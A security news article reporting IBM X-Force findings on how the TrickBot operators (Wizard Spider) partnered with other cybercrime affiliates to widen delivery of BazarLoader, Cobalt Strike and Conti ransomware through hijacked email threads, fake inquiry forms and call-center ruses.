The operators of the TrickBot Malware have resurfaced with new tricks seeking to increase its foothold by expanding its distribution channels, ultimately leading to the deployment of ransomware such as Conti.
The threat actor, tracked as Wizard Spider has been discovered to be in partnership with other cybercrime gangs such as Hive0105, Hive0106 and Hive0107 thus adding to the growing number of campaigns that the attackers are banking on to deliver proprietary malware, according to a report by IMB X-Force.
Researchers have stated that cybercrime vendors are infecting corporate networks with malware by hijacking email threads, using fake customer response forms and social engineering employees with a fake call center know as BazarCall.
Since emerging on the threat landscape in 2016, TrickBot has evolved from a banking trojan to a modular Windows-based crimeware solution, while also standing out for its resilience, demonstrating the ability to maintain and update its toolset and infrastructure despite multiple efforts by law enforcement and industry groups to take it down. Besides TrickBot, the Wizard Spider group has been credited with the development of BazarLoader and a backdoor called Anchor.
TrickBot arrived on the threat landscape in 2016 evolving from being a banking trojan to a modular Windows-based crimeware solution. Demonstrating its ability to maintain and update its toolset and infrastructure despite multiple efforts by law enforcement to take it down.
Earlier attacks this year relied on email campaigns delivering Excel documents and a call center ruse dubbed “BazaCall” to deliver malware to corporate users, recent intrusions beginning around June 2021 have been marked with a partnership with two cybercrime affiliates to augment its distribution infrastructure by leveraging hijacked email threads and fraudulent website customer inquiry forms on organization websites to deploy Cobalt Strike payloads.
“This move not only increased the volume of its delivery attempts but also diversified delivery methods with the goal of infecting more potential victims than ever,” the researchers said.
One of the infection chain observed by IBM in late August 2021, the Hive0107 affiliate is said to have adopted a new tactic involving nsending email messages to target companies informing that their websites have been performing distributed denial-of-service (DDoS) attacks on its servers, urging the recipients to click on a link for additional evidence. Once clicked, the link instead downloads a ZIP archive containing a malicious JavaScript (JS) downloader that, in turn, contacts a remote URL to fetch the BazarLoader malware to drop Cobalt Strike and TrickBot.
“ITG23 has also adapted to the ransomware economy through the creation of the Conti ransomware-as-a-service (RaaS) and the use of its BazarLoader and Trickbot payloads to gain a foothold for ransomware attacks,” the researchers concluded. “This latest development demonstrates the strength of its connections within the cybercriminal ecosystem and its ability to leverage these relationships to expand the number of organizations infected with its malware.”